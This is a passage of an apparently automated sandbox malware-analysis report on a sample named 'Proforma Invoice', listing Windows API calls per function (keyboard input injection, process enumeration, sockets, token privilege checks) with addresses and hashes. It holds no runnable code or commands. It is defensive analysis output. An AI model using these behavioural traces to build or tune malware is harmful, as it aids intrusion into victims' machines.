                                                                                                • Opcode Fuzzy Hash: 4400d805f5b8d26bf36ab488cb596138cb8016942531938f2b70cb2fa0f7bf2c
                                                                                                • Instruction Fuzzy Hash: EAA159356047019FCB80EF28C481B6AB7E5BF8A714F14491CF9969B3A1CB38ED45CB96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                • String ID:
                                                                                                • API String ID: 2808897238-0
                                                                                                • Opcode ID: c3d1bcdc85e262577a0a147869e3965336e1125eca80cbde356e0b7c03e76dc5
                                                                                                • Instruction ID: 3161eef845af1f6dc2346c302b0802eb9e32bd150c20fc0f2f7d3583fc380177
                                                                                                • Opcode Fuzzy Hash: c3d1bcdc85e262577a0a147869e3965336e1125eca80cbde356e0b7c03e76dc5
                                                                                                • Instruction Fuzzy Hash: EC51D17470030ADADB64AF65C891A7AB3E7EF45310F20D81FF696DB291DA74DC418B18
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(011AE5B0,?), ref: 00729863
                                                                                                • ScreenToClient.USER32(00000002,00000002), ref: 00729896
                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00729903
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                • String ID:
                                                                                                • API String ID: 3880355969-0
                                                                                                • Opcode ID: 4097eb3180eaeaa6bc6ba1b07b66a0bd1d27aa712bc7c4a48dba8d2d847b1877
                                                                                                • Instruction ID: 3730c4a58747c5f60857be2e18f446ebad5924d552f9744deec8665dca1e3a68
                                                                                                • Opcode Fuzzy Hash: 4097eb3180eaeaa6bc6ba1b07b66a0bd1d27aa712bc7c4a48dba8d2d847b1877
                                                                                                • Instruction Fuzzy Hash: A4516F34A00219EFCF10CF58D880AAE7BB5FF95360F18816DF9559B2A0D734AD81CB90
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006F9AD2
                                                                                                • __itow.LIBCMT ref: 006F9B03
                                                                                                  • Part of subcall function 006F9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 006F9DBE
                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 006F9B6C
                                                                                                • __itow.LIBCMT ref: 006F9BC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$__itow
                                                                                                • String ID:
                                                                                                • API String ID: 3379773720-0
                                                                                                • Opcode ID: 0023ce8850d0e8c3e9321674e0ddd45c5fd4838ecfc37a024e55e2e034ff611e
                                                                                                • Instruction ID: ab08fde0a04c3bab748623871c6be113b99c70ef78dc6daac95f04c21dddb4d8
                                                                                                • Opcode Fuzzy Hash: 0023ce8850d0e8c3e9321674e0ddd45c5fd4838ecfc37a024e55e2e034ff611e
                                                                                                • Instruction Fuzzy Hash: CF418E70A0020DABDF25EF54D845BFE7BBAEF45720F000069FA05A7291DB709E49CBA5
                                                                                                APIs
                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 007169D1
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007169E1
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00716A45
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00716A51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                • String ID:
                                                                                                • API String ID: 2214342067-0
                                                                                                • Opcode ID: 2f06f37b0a593e0a22c2955f6e9255dbec078909357f72866af9d70c0f1fec3c
                                                                                                • Instruction ID: bae3dcdeb06ae38e5c9cb93d1498a98c89d94c7c6477dfc75d0b2fdf483aea17
                                                                                                • Opcode Fuzzy Hash: 2f06f37b0a593e0a22c2955f6e9255dbec078909357f72866af9d70c0f1fec3c
                                                                                                • Instruction Fuzzy Hash: 6D41B2746002006FEBA0BF24CC86F7A77A59F45B10F14C52CFA19AB2C2DA749D018B65
                                                                                                APIs
                                                                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0072F910), ref: 007164A7
                                                                                                • _strlen.LIBCMT ref: 007164D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID:
                                                                                                • API String ID: 4218353326-0
                                                                                                • Opcode ID: 202bff51ce3c65c12b1636b4421bfe420573188d15b59bf4f0659e926a524be4
                                                                                                • Instruction ID: e347d5599e7e88e4298a378a0ea992b5dfb6fa6420f7ce8e4a53f04b5bda8a93
                                                                                                • Opcode Fuzzy Hash: 202bff51ce3c65c12b1636b4421bfe420573188d15b59bf4f0659e926a524be4
                                                                                                • Instruction Fuzzy Hash: AA41A271500104ABCB54FBA8DC85FFEB7BAAF05310F108169F91A9B2D2DB34AE50CB64
                                                                                                APIs
                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0070B89E
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0070B8C4
                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0070B8E9
                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0070B915
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 3321077145-0
                                                                                                • Opcode ID: c05f6008b8719befe7074eb30c12a0e6f3dc6aa926c2ff937ded696a4bec0dc6
                                                                                                • Instruction ID: 17668bd554254200e2db34b1c934b199ae171209b022be01e02c9bf337a6321f
                                                                                                • Opcode Fuzzy Hash: c05f6008b8719befe7074eb30c12a0e6f3dc6aa926c2ff937ded696a4bec0dc6
                                                                                                • Instruction Fuzzy Hash: A4411B35600510DFCB50EF25C444A5ABBE2AF4A710F15C498ED4A9B3A2CB38FD01CFA5
                                                                                                APIs
                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007288DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: InvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 634782764-0
                                                                                                • Opcode ID: 049966a24b09c926a8b091b37ac5f4e99fda845ef364bd78a4faee01225caf31
                                                                                                • Instruction ID: fcd9ad243933931699fa210f9e757aa2d9b994a064886c541016759fa962854c
                                                                                                • Opcode Fuzzy Hash: 049966a24b09c926a8b091b37ac5f4e99fda845ef364bd78a4faee01225caf31
                                                                                                • Instruction Fuzzy Hash: A2312634602128EFEBA09A18EC45FB837B1EB09310F544112FA91E61A1CE7EF9C09B47
                                                                                                APIs
                                                                                                • ClientToScreen.USER32(?,?), ref: 0072AB60
                                                                                                • GetWindowRect.USER32(?,?), ref: 0072ABD6
                                                                                                • PtInRect.USER32(?,?,0072C014), ref: 0072ABE6
                                                                                                • MessageBeep.USER32(00000000), ref: 0072AC57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1352109105-0
                                                                                                • Opcode ID: 2fee6fc46c09c2ebc4b761cf955a030db01fbe833a829d1a3abb2accf049fd5d
                                                                                                • Instruction ID: ed676bb37d17c5b258a43f8a48c1500fff8e2e21b3dca11bdba3e114233520eb
                                                                                                • Opcode Fuzzy Hash: 2fee6fc46c09c2ebc4b761cf955a030db01fbe833a829d1a3abb2accf049fd5d
                                                                                                • Instruction Fuzzy Hash: B241A430600229EFCB21DF58E884B69B7F5FF49310F1480A9E555DB264D738E981DFA2
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00700B27
                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00700B43
                                                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00700BA9
                                                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00700BFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                • String ID:
                                                                                                • API String ID: 432972143-0
                                                                                                • Opcode ID: 821d94e3f3a8b86387aa2c79ba5602ab87cba4d6e1f5215881e8e30e32a61b6c
                                                                                                • Instruction ID: d4907135882abfe21fa62a11480033cba9880513b21aa487743a50782b1f5c35
                                                                                                • Opcode Fuzzy Hash: 821d94e3f3a8b86387aa2c79ba5602ab87cba4d6e1f5215881e8e30e32a61b6c
                                                                                                • Instruction Fuzzy Hash: FF313AB0D40218EEFF318B298C09BFABBE5AB45334F08436AE591521D1C3BD895197E5
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00700C66
                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00700C82
                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00700CE1
                                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00700D33
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                • String ID:
                                                                                                • API String ID: 432972143-0
                                                                                                • Opcode ID: 41abf3d91fc47c168e9bb2c09c9b0a3d20ef7cab841b695f5f2c4a789a7b4c58
                                                                                                • Instruction ID: de1c0d74b57904c64e663da2dda52d7400ec0d0ce7c99b9111667097e1a4ca64
                                                                                                • Opcode Fuzzy Hash: 41abf3d91fc47c168e9bb2c09c9b0a3d20ef7cab841b695f5f2c4a789a7b4c58
                                                                                                • Instruction Fuzzy Hash: CB310330A40258EEFF348B658818BFFBBE6AB45330F04832AE485921D1C37D995597F5
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006D61FB
                                                                                                • __isleadbyte_l.LIBCMT ref: 006D6229
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006D6257
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006D628D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 9ce942beb0383c581088fe5bf3aa2c1ee7e013c3a2d70529414aecaac06ba465
                                                                                                • Instruction ID: 2a3cb32221be2c7799fcdb588913de7bd9a870db87f3a9af1462bcfb2663d1ff
                                                                                                • Opcode Fuzzy Hash: 9ce942beb0383c581088fe5bf3aa2c1ee7e013c3a2d70529414aecaac06ba465
                                                                                                • Instruction Fuzzy Hash: E831B031A04256AFDF218F69CC45BBA7BBAFF41310F15402AF864973A1D731DA51DB90
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 00724F02
                                                                                                  • Part of subcall function 00703641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0070365B
                                                                                                  • Part of subcall function 00703641: GetCurrentThreadId.KERNEL32 ref: 00703662
                                                                                                  • Part of subcall function 00703641: AttachThreadInput.USER32(00000000,?,00705005), ref: 00703669
                                                                                                • GetCaretPos.USER32(?), ref: 00724F13
                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00724F4E
                                                                                                • GetForegroundWindow.USER32 ref: 00724F54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                • String ID:
                                                                                                • API String ID: 2759813231-0
                                                                                                • Opcode ID: b02a4365ae3b0160802642541d525cf5bebe2e44cf149f7201ecbda67349bc9c
                                                                                                • Instruction ID: 64a653e0380e66b4a5c5b52d0eb972dd661ea206c5cd40c8c4e122641371f90d
                                                                                                • Opcode Fuzzy Hash: b02a4365ae3b0160802642541d525cf5bebe2e44cf149f7201ecbda67349bc9c
                                                                                                • Instruction Fuzzy Hash: 0E313C71D00108AFDB10EFA5C9859EFB7FDEF89300F10456AE815E7241EA79AE458FA4
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00703C7A
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00703C88
                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00703CA8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00703D52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 420147892-0
                                                                                                • Opcode ID: c983cd8fb4f2255075f2f320c591e99e6a6402493b6613475076117d41deb4d5
                                                                                                • Instruction ID: 420ea35c06d6e8eb7a3e314c269f958d8bc0bca060d53a0ee48f689473d4c3cc
                                                                                                • Opcode Fuzzy Hash: c983cd8fb4f2255075f2f320c591e99e6a6402493b6613475076117d41deb4d5
                                                                                                • Instruction Fuzzy Hash: B731BF71108345DFD310EF10C881AAFBBE9AF96314F50092DF582861A1EB759E49CB92
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • GetCursorPos.USER32(?), ref: 0072C4D2
                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006DB9AB,?,?,?,?,?), ref: 0072C4E7
                                                                                                • GetCursorPos.USER32(?), ref: 0072C534
                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006DB9AB,?,?,?), ref: 0072C56E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2864067406-0
                                                                                                • Opcode ID: 6c2fe2aefdf6e0057856d7e6ad0240f8be118192a96c950700e6da421ce31fb2
                                                                                                • Instruction ID: 2ad10f60dcd82dcc22a829610dd04ec43353c84293327c9bfe72f2d0619e9ece
                                                                                                • Opcode Fuzzy Hash: 6c2fe2aefdf6e0057856d7e6ad0240f8be118192a96c950700e6da421ce31fb2
                                                                                                • Instruction Fuzzy Hash: B631E435600068EFCB26CF59D858EEE7BF6EB09350F144069F9058B261C739AD61DFA8
                                                                                                APIs
                                                                                                  • Part of subcall function 006F810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006F8121
                                                                                                  • Part of subcall function 006F810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006F812B
                                                                                                  • Part of subcall function 006F810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006F813A
                                                                                                  • Part of subcall function 006F810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006F8141
                                                                                                  • Part of subcall function 006F810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006F8157
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006F86A3
                                                                                                • _memcmp.LIBCMT ref: 006F86C6
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006F86FC
                                                                                                • HeapFree.KERNEL32(00000000), ref: 006F8703
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1592001646-0
                                                                                                • Opcode ID: 331928a3b624cc726dab2d2115f3993a27dd7b9127ec0ea3d986f458250431b8
                                                                                                • Instruction ID: ba2e2aef548c80736dfcb59d1ae9f08a7fb16a810563b1b8927ed25b7e9bf587
                                                                                                • Opcode Fuzzy Hash: 331928a3b624cc726dab2d2115f3993a27dd7b9127ec0ea3d986f458250431b8
                                                                                                • Instruction Fuzzy Hash: 8A217C71E00109EFDB10DFA4C949BFEB7BAEF55304F158099E544AB241EB31AE05CB94
                                                                                                APIs
                                                                                                • __setmode.LIBCMT ref: 006C09AE
                                                                                                  • Part of subcall function 006A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00707896,?,?,00000000), ref: 006A5A2C
                                                                                                  • Part of subcall function 006A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00707896,?,?,00000000,?,?), ref: 006A5A50
                                                                                                • _fprintf.LIBCMT ref: 006C09E5
                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 006F5DBB
                                                                                                  • Part of subcall function 006C4AAA: _flsall.LIBCMT ref: 006C4AC3
                                                                                                • __setmode.LIBCMT ref: 006C0A1A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
